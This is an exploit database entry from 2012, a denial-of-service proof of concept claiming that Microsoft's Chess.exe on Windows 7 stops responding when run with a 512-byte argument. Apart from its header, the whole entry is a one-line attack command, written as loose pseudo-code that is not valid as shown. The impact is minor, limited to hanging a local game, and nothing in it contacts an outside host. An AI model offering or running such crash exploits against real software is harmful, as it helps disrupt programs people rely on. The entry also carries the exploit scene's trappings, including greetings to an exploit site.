id: 17833
date: 03/25/2012
title: Microsoft Games Chess.exe DOS PoC
author: Dan Fosco
cves: 

# Exploit Title: Microsoft Games Chess.exe DOS PoC
# Date: 3/25/2012
# Author: Dan Fosco
# Vendor or Software Link: www.microsoft.com
# Version: 6.1.7600.16385
# Category: dos
# Google dork: n/a
# Tested on: Windows 7 SP1 (64-bit)
# Greetz: Inj3ct0r Exploit DataBase 1337day.com


Chess.exe becomes unresponsive when supplied a file with a length of 512 bytes.

poc:

system("Chess.exe " + (A * 512));



#  0day.today [2023-03-24]  #